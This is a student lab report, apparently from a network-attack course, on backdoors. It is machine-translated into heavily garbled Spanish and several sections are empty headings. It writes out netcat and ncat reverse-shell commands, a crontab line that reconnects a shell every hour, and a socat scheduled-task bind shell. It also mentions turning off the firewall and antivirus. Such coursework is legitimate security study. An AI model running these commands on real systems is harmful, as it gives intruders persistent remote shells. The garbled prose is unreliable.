2019-2020-2 20175227 Zhang Xueying "Red contra la tecnología."
Principios puerta trasera Exp2 y Práctica
directorio
0. Los Fundamentos
1. contenido Experimental
- 1,0 de puerta trasera GENERAL
- 1.1 netcat obtener el huésped que opera Shell, Cron empezar
- 1.2 Socat obtener el huésped que opera Shell, planes de comenzar la tarea
- 1.3 Uso de MSF meterpreter (u otro software) para generar un archivo ejecutable, o el uso NCAT socat al host y se ejecutan para obtener el anfitrión Shell
- meterpreter 1.4 MSF (u otro software) para generar el host de destino para obtener el contenido de audio, cámara, keyloggers, etc., y tratar de poner a la derecha
- 1.5 plus contenido opcional: MSF generado utilizando el código shell, se vertió en 1 pwn1 en la práctica, la conexión en dos tiempos de adquisición de Shell
2. El profesor hace una pregunta
- 2.1 incluyen una puerta trasera que se pueda imaginar posibles formas de entrar en su sistema?
- 2.2 ¿Cómo sabes que ejemplifica la puerta de atrás para poner en marcha (ganar y Linux) forma?
- Que le da una función de mapeo de profundidad 2.3 Meterpreter allí?
- 2.4 Cómo encuentras el sistema no se ha instalado la puerta de atrás?
3. Los problemas encontrados y sus soluciones
4. pensamientos experimentales
5. Referencias
0. Los Fundamentos
0.1 concepto de puerta posterior
No a través del proceso de certificación normal y el sistema de canales de acceso.
0.2 Cuando la puerta trasera?
- El compilador de dejar la puerta trasera
- el sistema operativo para puerta de atrás estancia
- La aplicación más común, por supuesto, dejar la puerta trasera
No está al acecho en el sistema operativo o puertas traseras encubiertas dedicados para una aplicación específica.
0.3 Concepto relativamente estrecho de la puerta trasera:
- Especialmente al acecho en el sistema operativo diseñado para hacer un programa de puerta trasera
- "Los malos" pueden conectarse a este programa
- ejecutar varios comandos remoto
El concepto y la superposición troyanos
1. contenido Experimental
1,0 de puerta trasera GENERAL
NC
Onetcat
: se trata de una herramienta de fondo, el básicoTCP
UDP
de transmisión y recepción de datos. El uso a menudo se combina con otras herramientas, desempeñar el papel de la puerta trasera.Linux
: Viene generalnetcat
, "man netcat
" o "man nc
" para ver las instrucciones para su uso.Windows
: Curso de Inicio accesorios descargancat.rar
extracto puede ser utilizado.Mac
: El sistema viene "man nc
" para ver su uso.1.0.1 Win obtener Shell Linux
- escucha por las ventanas
- Descargar ncat.rar, descomprimir a cualquier lugar de acogida. (Para mayor comodidad, lo pongo
C:\Users\S2
en, por lo que puede ir directamente a la línea de comandos) - En la prensa principal
Windows+r
Entercmd
para abrir la línea de comandos, introduzcaipconfig
para ver la dirección IP del host
- Descargar ncat.rar, descomprimir a cualquier lugar de acogida. (Para mayor comodidad, lo pongo
- En la
nc
misma carpeta, introduzcancat.exe -l -p <端口号>
como:
- Linux victoria conexión de rebote
- En el
kali
tipo de terminalnc <主机IP地址> <之前输入的端口号> -e /bin/sh
, como se muestra:
- En el
windows
Obtenido en alinux shell
, cualquier comando se puede ejecutar, como por ejemplols
,pwd
1.0.2 Linux conseguir victorias Shell
- Linux ejecutando el comando Oyente
- Introduzca
ip add
VerLinux
dirección IP
- Después de entrar
nc -l -p <端口号>
, se encuentra en un estado de escucha
- Introduzca
- Ventanas rebote de conexión Linux
- entrada
ncat.exe -e cmd.exe ip_of_linux <之前输入的端口号>
- entrada
- Ver el símbolo del sistema de Windows en Linux
1.0.3 Transmisión de datos utilizando nc
- Windows que se ejecuta el comando Oyente
- conexión de Linux a Windows
- Una vez establecida la conexión de datos se pueden transmitir
1.1 netcat obtener el huésped que opera Shell, Cron empezar
- Abra una línea de comandos en el host, utilizando el
ncat.exe -l 5227
monitor de5227
puerto
- En Linux, un terminal, introduzca
crontab -e
editar un temporizador tarea, después de seleccionar el editor3
, se inserta en la fila inferior30 * * * * /bin/netcat 192.168.171.1 5227 -e /bin/sh
, es decir, la conexión inversa del huésped en los primeros 30 minutos de cada hora5227
puerto.
1.2 Socat obtener el huésped que opera Shell, planes de comenzar la tarea
- Descargar el maestro en el equipo host accesorio proporcionado
socat.rar
, y luego extraer la ruta opcional. - Encuentra la parte inferior izquierda ventanas banderín de esquina, el anfitrión, y luego
右键
->计算机管理
->任务计划程序
->创建任务
- En la
常规
ficha Relleno en el Nombre de tarea (puse el nombre aquízxysocat
), a continuación,触发器
la pestaña nueva activación, seleccione la siguiente ilustración:
- En la
操作
ficha, seleccione新建操作
el ajuste para la程序或脚本处
verificación de descomprimir el archivo descargadosocat.exe
ruta, añadir parámetros para rellenartcp-listen:<端口号> exec:cmd.exe,pty,stderr
, a punto decmd.exe
obligar al número de puerto, al mismo tiempocmd.exe
lastderr
redirecciónstdout
sucesivamente.
- Después de determinar el funcionamiento, la regularización se win + L para bloquear el anfitrión, después de iniciar la sesión, haga doble clic en Programador de tareas de la Biblioteca, se pueden encontrar socat tarea recién creada ya se está ejecutando.
- A continuación, en la entrada Linux
socat - tcp:<主机IP>:<之前输入的端口号>
, en el que la-
entrada / salida estándar, un segundo puerto de flujo correspondiente al host. Después de que el descubrimiento ha obtenido con éxito unacmd Shell
1.3 Uso de MSF meterpreter (u otro software) para generar un archivo ejecutable, o el uso NCAT socat al host y se ejecutan para obtener el anfitrión Shell
meterpreter 1.4 MSF (u otro software) para generar el host de destino para obtener el contenido de audio, cámara, keyloggers, etc., y tratar de poner a la derecha
1.5 plus contenido opcional: MSF generado utilizando el código shell, se vertió en 1 pwn1 en la práctica, la conexión en dos tiempos de adquisición de Shell
2. El profesor hace una pregunta
2.1 incluyen una puerta trasera que se pueda imaginar posibles formas de entrar en su sistema?
2.2 ¿Cómo sabes que ejemplifica la puerta de atrás para poner en marcha (ganar y Linux) forma?
Que le da una función de mapeo de profundidad 2.3 Meterpreter allí?
2.4 Cómo encuentras el sistema no se ha instalado la puerta de atrás?
3. Los problemas encontrados y sus soluciones
3.1 Pregunta 1
- Descripción: No se puede ver
Linux
la dirección IP,ifconfig
el comando no se puede encontrar, como se muestra:
- Solución: Sospecho que no está instalado con las
ifconfig
órdenes pertinentes del kit, después de la búsqueda en Internet para el comandonet-tools
enapt-get install net-tools
la pantalla del equipo se ha instalado, como se muestra:
Después de encontrar un blog encontró que ifconfig
el comando ha sido eliminado, se sugiere el uso de ip add
la orden, realmente encontrado la dirección IP del resultado aquí.
3.2 Pregunta 2
- Descripción: Linux Fallo del monitor, no pudo entrar en el shell de Windows, como se muestra:
- Solución: supongo que probablemente debido a servidor de cortafuegos tiene su intercepción, la interceptación de la información abierta a la vista, por lo que, como se muestra:
Después de cerrar el servidor de seguridad, el software de seguridad de desinstalación, Linux entrado con éxito en el shell de Windows, los resultados aquí.
3.3 Pregunta 3
Descripción: execstack no se instala, como se muestra:
- Solución: Introduzca
sudo apt-get update
ysudo apt-get install execstack
esperar unos momentos. ##### 3.4 Pregunta 4- Descripción:
- solución:
4. pensamientos experimentales
- En este experimento, he experimentado a través de la práctica específicamente en el último término "tecnología de seguridad de la información" aprendido ataques de desbordamiento de búfer. Comprensión más profunda, desbordamiento de búfer ataques, en particular, cómo modificar la dirección de retorno combinará este conocimiento en lenguaje ensamblador y "Diseño de Sistemas de Información de Seguridad" aprendido algunas instrucciones, la cosecha no es realmente pequeño. En general, la prueba fue muy bien, básicamente, los problemas encontrados son simples, gracias a la maestra explicó cuidadosamente y un resumen de la tercera edad anteriores Blog, aprender deprimido tanto aprendido mucho, estado entrenando muy grande.